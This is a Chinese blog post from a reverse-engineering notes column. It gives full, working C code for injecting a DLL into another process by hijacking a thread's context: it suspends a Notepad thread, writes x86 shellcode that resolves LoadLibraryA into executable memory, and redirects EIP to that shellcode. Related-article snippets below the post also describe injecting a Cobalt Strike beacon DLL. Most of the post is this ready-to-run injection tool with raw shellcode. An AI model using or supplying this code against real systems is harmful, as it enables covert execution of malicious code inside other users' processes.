修改线程上下文注入DLL

最新推荐文章于 2023-08-30 00:52:02 发布
最新推荐文章于 2023-08-30 00:52:02 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: 逆向笔记 文章标签: ShellCode 线程上下文 注入 dll
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AntiHips/article/details/53023620
版权

一、注入原理

  

   获取目标进程的某个线程,暂停之,获取线程上下文,分配虚拟内存,写入ShellCode,修改上下文结构EIP指向ShellCode,设置上下文,恢复线程,就这么简单。

 

 

二、完整代码

   

DWORD injectThreadContext( HWND hWindow, const char * lpszDllPath )
{
	DWORD	dwProcessID		= 0;
	DWORD	dwThreadID		= 0;
	unsigned char shellcode[] = {	0x68, 0x00, 0x00, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xD0, 0x83, 0xC4, 0x04,         
													0xE9, 0x00, 0x00, 0x00, 0x00,
													0x55,0x8B,0xEC,0x60,0x9C,0x83,0xEC,0x28,0xB9,0x0A,0x00,0x00,0x00,0xB8,0xCC,0xCC,0xCC,
													0xCC,0x8D,0x7D,0xB4,0xF3,0xAB,0x6A,0x00,0x68,0x61,0x72,0x79,0x41,0x68,0x4C,0x69,0x62,
													0x72,0x68,0x4C,0x6F,0x61,0x64,0x64,0xA1,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,
													0x14,0x8B,0x00,0x8B,0x70,0x28,0x80,0x7E,0x0C,0x33,0x75,0xF5,0x8B,0x40,0x10,0x8B,0xF8,
													0x03,0x7F,0x3C,0x8B,0x7F,0x78,0x03,0xF8,0x8B,0xDF,0x8B,0x53,0x20,0x03,0xD0,0xC7,0x45,
													0xB4,0x00,0x00,0x00,0x00,0x8B,0xF5,0x83,0xEE,0x5C,0x8B,0x4D,0xB4,0x8B,0x3C,0x8A,0x03,
													0xF8,0x83,0x45,0xB4,0x01,0xB9,0x0C,0x00,0x00,0x00,0xF3,0xA6,0x75,0xE6,0x8B,0x7B,0x24,
													0x03,0xF8,0x8B,0x4D,0xB4,0x8B,0x0C,0x4F,0x81,0xE1,0xFF,0xFF,0x00,0x00,0x8B,0x7B,0x10,
													0x2B,0xCF,0x8B,0x7B,0x1C,0x03,0xF8,0x8B,0x3C,0x8F,0x03,0xC7,0x8B,0x5D,0x08,0x53,0xFF,
													0xD0,0x83,0xC4,0x38,0x9D,0x61,0x8B,0xE5,0x5D,0xC3		};

	dwThreadID = GetWindowThreadProcessId( hWindow, &dwProcessID );
	HANDLE	hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwProcessID );
	if ( NULL == hProcess )
		return GetLastError();

	HANDLE	hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, dwThreadID);
	if ( NULL == hThread )
	{
		CloseHandle(hProcess);
		return GetLastError();
	}
	
	SuspendThread( hThread );
	
	CONTEXT stcContext = { CONTEXT_FULL };
	if ( FALSE == GetThreadContext( hThread, &stcContext ) )
	{
		CloseHandle( hThread );
		CloseHandle( hProcess );
		return GetLastError();
	}

	LPVOID lpMem = VirtualAllocEx( hProcess, NULL, 1024, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
	if ( NULL == lpMem )
	{
		CloseHandle( hThread );
		CloseHandle( hProcess );
		return GetLastError();
	}

	SIZE_T nWrite = 0;
	SIZE_T nSizeOfShellCode = sizeof(shellcode);
	
	LPVOID lpCode = lpMem;
	LPVOID lpDllName = (LPVOID)( (DWORD)lpCode + nSizeOfShellCode + 5 );
	*((PDWORD)(shellcode +  1))   = (DWORD) lpDllName;
	*((PDWORD)(shellcode +  6))   = (DWORD)lpCode + 20;
	*((PDWORD)(shellcode + 16))   = stcContext.Eip - ( (DWORD)lpCode + 15 ) - 5;
	WriteProcessMemory( hProcess, lpCode, shellcode, nSizeOfShellCode, &nWrite );
	WriteProcessMemory( hProcess, lpDllName, lpszDllPath, strlen(lpszDllPath), &nWrite );

	stcContext.Eip = (DWORD)lpCode;
	
	SetThreadContext(hThread, &stcContext);
	ResumeThread(hThread);

	CloseHandle( hThread );
	CloseHandle( hProcess );

	return 0;
}


int _tmain(int argc, _TCHAR* argv[])
{
	const char * lpszDll					= "asm_dll.dll";
	const char * lpszWindowName = "无标题 - 记事本";		// [ LordPE Deluxe ] by yoda
	HWND hWindow = FindWindowA( NULL, lpszWindowName );
	if ( hWindow == NULL )
	{
		printf( "找不到指定窗口: %s \r\n", lpszWindowName );
		return 0;
	}

	DWORD dwRet = injectThreadContext( hWindow, lpszDll );
	printf( "injectThreadContext ret: %d \r\n", dwRet );
}


 

三、注解

 

   1、ShellCode还是用的上一篇文章的 http://blog.csdn.net/antihips/article/details/53020750,调用方式稍作改造:

            

push lpszDllPath
		mov eax, ShellCode
		call eax
		add esp, 0x4

 

    整个代码结构就是:

      调用者

      ShellCode

      名称字符串

 

      注意:这里我们需要修正 dll 路径名称,ShellCode 地址,JMP回去的地址

 

 

   2、查找目标进程,获取进程ID,线程ID,打开之

  

   3、暂停线程,获取线程上下文,分配虚拟内存

 

   4、修正 ShellCode 中的地址,写入到虚拟内存,修改线程上下文 EIP。

 

   5、把线程上下文设置回去,恢复线程。

 

 

四、效果

 

     

___stdcall
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
线程注入ThreadInject(dll)
weixin_34121304的博客
10-20 180
原理通过挂起线程(SuspendThread),设置线程(SetThreadContext)上下文中的eip(rip)方式注入。//ThreadInject.h #pragma once // ThreadInject 对话框 class ThreadInject : public CDialogEx { DECLARE_DYNAMIC(ThreadInject) public: ...
如何向其他线程的地址空间中注入代码并在这个线程上下文中执行之
Mycro的专栏
10-25 1201
2005-07-17T04:25:02Z 如果转载该译文,请保证文章的完整性,并注明来自www.farproc.com袁晓辉 2005/5/20原版地址:http://www.codeproject.com/threads/winspy.asp?df=100&forumid=16291&select=1025152&msg=1025152下载整个压缩包下载WinSpy作者:Robert Kuste
线程上下文传递inheritableThreadLocal
小麒麟的博客
09-30 644
inheritableThreadLocal 能满足上下文之间的数据传递 前提是在父类线程中创建子类线程; 参见源码如下: Thread类有两个属性 ThreadLocal.ThreadLocalMap threadLocals = null; ThreadLocal.ThreadLocalMap inheritableThreadLocals = null; 我们在进...
线程调用(通过修改线程上下文实现)
akoy71645的博客
02-12 825
思路:将主线程挂起后获取到主线程的eip,然后将eip修改shellcode的地址恢复线程运行,当shellcode执行完成后跳转到旧eip处继续执行。 1 typedef VOID(__stdcall *PFN_CALL)(const VOID *pvIn, VOID *pvOut); 2 3 BOOL CallForThread(DWORD dwThreadId,...
修改EIP注入DLL入的一个示例
late0001的专栏
06-05 498
HWND hWnd=::FindWindow(NULL,L"窗口标题"); if(hWnd==NULL) { MessageBox(L"未获取窗口句柄!",L"失败",MB_OK); return; } DWORD pid,tid; tid=GetWindowThreadProcessId(hWnd,&pid); if(tid { Mes
易语言线程上下文注入源码-易语言
06-13
线程上下文注入是Windows系统编程中的一个高级技术,常用于系统调试、插件开发、安全检测等领域。在易语言中实现线程上下文注入,可以让程序在其他线程的执行环境中运行代码,从而达到特定的目的。 线程上下文注入...
远程线程注入_远程_远程线程_dll注入_注入_
10-01
远程线程注入是通过在目标进程中创建一个新的线程,并在该线程上下文中执行指定的代码。这允许一个进程(注入者)在另一个进程(被注入者)中运行其代码,而无需修改注入进程的可执行文件。这一过程通常涉及以下...
使用全局和线程钩子注入DLL.rar
08-04
这种钩子需要在所有需要捕获事件的进程中都存在同一个可执行文件(通常是DLL),因为钩子函数必须在调用线程上下文中运行。这通常通过DLL注入技术来实现,即将DLL加载到目标进程的地址空间中。 线程钩子则更为...
使用远程线程注入DLL
08-04
远程线程注入是一种技术,主要用于在另一个进程的上下文中执行代码。这种技术在软件开发、调试、自动化测试以及恶意软件中都有应用。本篇将详细解释远程线程注入的概念、工作原理,以及如何通过代码实现。 远程线程...
DLL注入器.rar
04-04
DLL(Dynamic Link Library)注入是一种高级的编程技术,通常用于在其他进程上下文中执行代码,以便于调试、监控、扩展或篡改程序行为。DLL注入器是实现这一技术的工具,它允许用户将自定义的DLL文件加载到目标进程...
通过修改EIP寄存器实现强行跳转并且注入DLL到目标进程里
10-21
通过修改EIP寄存器实现强行跳转并且注入DLL到目标进程里
编程中上下文
feng__shuai的博客
08-21 427
每一段程序都有很多外部变量。只有像Add这种简单的函数才是没有外部变量的。一旦你的一段程序有了外部变量,这段程序就不完整,不能独立运行。你为了使他们运行,就要给所有的外部变量一个一个写一些值进去。这些值的集合就叫上下文。譬如说在C++的lambda表达是里面,[写在这里的就是上下文](int a, int b){ ... }。 ...
使数据区“可执行”的几种常规办法
hambaga的博客
01-21 830
一、VirtualProtect 这个函数可以修改缓冲区的页面属性,传入 PAGE_EXECUTE_READWRITE 让缓冲区可执行。 BOOL VirtualProtect( LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect ); 二、SetProcessDEPPolicy 这个函数可以在运行时修改进程的DEP属性。 BOOL SetProcessDEPPolicy( DWORD
全面介绍Windows内存管理机制及C++内存分配实例
zhujunwsk的专栏
09-08 2840
(一):进程空间   本文背景: 在编程中,很多Windows或C++的内存函数不知道有什么区别,更别谈有效使用;根本的原因是,没有清楚的理解操作系统的内存管理机制,本文企图通过简单的总结描述,结合实例来阐明这个机制。 本文目的: 对Windows内存管理机制了解清楚,有效的利用C++内存函数管理和使用内存。 1.      进程地址空间 1.1地址空间 ·        32|
DLL加载器-远程线程注入(常规dll注入
最新发布
bring_coco的博客
08-30 1348
注入思路 先获取到LoadLibrary的函数地址,之后使用CreateRemoteThread加载这段地址即可 简单例子: D:\VS项目\Dll3\x64\Debug\Dll3.dll kernel.dll加载的地址在所有进程都是一样的 https://zhuanlan.zhihu.com/p/599915628?utm_id=0 DLL进程注入 dll注入器 生成dll-2-1.exe 这里注入的exe是notepad++,找到其进程,注入dll是我cs生成的beacon.dll 主要思路是:
C++ Inline hook实现进程防终止(不用写驱动)
nnKevi的博客
06-23 2512
最近想写一个杀毒软件,可是别人在任务管理器里轻轻松松就把我的进程结束了,我希望把我的杀毒软件做成360那样,一旦结束就提示“拒绝访问”,而且不管你用任务管理器,还是taskkill,进程都无法结束。于是,我在网上搜集了大量的资料,很多资料都说要写驱动,可我是一名小白,根本不会写驱动,正准备去学的时候,突然发现写驱动需要数字签名,还要花250美金,也就是1750人民币左右!我可不想花这么多钱。我一开始误以为写驱动是为了在Ring0运行,从而让进程杀不掉,但是杀毒软件这个进程其实还是在Ring3运行的,所以不是
c++ 在内存中加载 exe/dll (不使用CreateProcess、LoadLibrary 等 API)
LYSM
06-24 4941
背景 在网上搜索了很多病毒木马的分析报告,看了一段时间后,发现还是有很多病毒木马都能够模拟PE加载器,把DLL或者是EXE等PE文件,直接从内存中直接加载到自己的内存中执行,不需要通过API函数去操作,以此躲过一些杀软的检测。 程序实现原理 首先,在EXE文件中,根据PE结构格式获取其加载映像的大小SizeOfImage,并根据SizeOfImage在自己的程序中申请一块可读、可写、可执行的内存,那么这块内存的首地址就是EXE程序的加载基址 然后,根据EXE中的PE结构格式获取其映像对齐大小Section
线程(进程)上下文
weixin_30539835的博客
05-13 272
字号:大 中 小 让我们来看看CreateThread都干了些什么。 上图显示了系统在创建线程和对线程进行初始化时必须做些什么工作。调用CreateThread可使系统创建一个线程内核对象。该对象的初始使用计数是2(在线程停止运行和从CreateThread返回的句柄关闭之前,线程内核对象不会被撤消)。线程的内核对象的其他属性也被初始化,暂停计数...
Windows远程注入DLL技术详解
"远程注入DLL技术,用于在其他进程中加载并执行自定义的DLL文件,以达到隐蔽执行代码的目的。该技术涉及多个Windows API函数,包括CreateRemoteThread、LoadLibrary和DllMain等。" 远程注入DLL是一种高级的编程技术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值